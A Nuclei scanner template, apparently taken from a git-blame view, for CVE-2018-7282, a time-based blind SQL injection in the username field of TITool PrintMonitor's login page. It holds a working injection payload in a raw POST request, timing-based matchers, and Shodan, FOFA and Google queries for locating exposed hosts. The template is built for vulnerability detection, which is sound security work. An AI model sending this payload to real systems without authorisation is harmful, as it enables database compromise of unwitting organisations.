2023-10-17 07:20:28 +00:00
|
|
|
id: CVE-2018-7282
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: TITool PrintMonitor - Blind SQL Injection
|
|
|
|
author: theamanrawat
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.
|
|
|
|
remediation: Upgrade to PM18.2.1.
|
|
|
|
reference:
|
|
|
|
- https://fenceposterror.github.io/cve-2018-7282.txt
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7282
|
2023-10-17 17:52:26 +00:00
|
|
|
- http://print.com
|
|
|
|
- http://ti-tool.com
|
2023-10-17 07:20:28 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2018-7282
|
|
|
|
cwe-id: CWE-89
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.1391
|
|
|
|
epss-percentile: 0.95658
|
2023-10-17 17:21:59 +00:00
|
|
|
cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:*
|
2023-10-17 07:20:28 +00:00
|
|
|
metadata:
|
|
|
|
verified: "true"
|
|
|
|
max-request: 1
|
|
|
|
vendor: titool
|
2023-10-17 17:52:26 +00:00
|
|
|
product: printmonitor
|
2024-06-07 10:04:29 +00:00
|
|
|
shodan-query:
|
|
|
|
- title:"PrintMonitor"
|
|
|
|
- http.title:"printmonitor"
|
2024-05-31 19:23:20 +00:00
|
|
|
fofa-query: title="printmonitor"
|
|
|
|
google-query: intitle:"printmonitor"
|
2024-06-07 10:04:29 +00:00
|
|
|
product": printmonitor
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve2018,cve,sqli,printmonitor,unauth,titool
|
2023-10-17 07:20:28 +00:00
|
|
|
variables:
|
|
|
|
username: "{{rand_base(6)}}"
|
|
|
|
password: "{{rand_base(8)}}"
|
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
@timeout: 20s
|
|
|
|
POST /login.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
username={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en
|
|
|
|
|
|
|
|
host-redirects: true
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'duration>=6'
|
|
|
|
- 'status_code == 200'
|
|
|
|
- 'contains(body, "PrintMonitor") && contains(header, "text/html")'
|
|
|
|
condition: and
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 4a0a00473045022100ec573b18c670d29560ed71dcf93443f68e034fce66f06294bf0b23aeadb462e1022003bfb3d3de007d87998765d3ec871ac5efff191cf95c1a2f148e89d9a66816d5:922c64590222798bb761d5b6d8e72950
|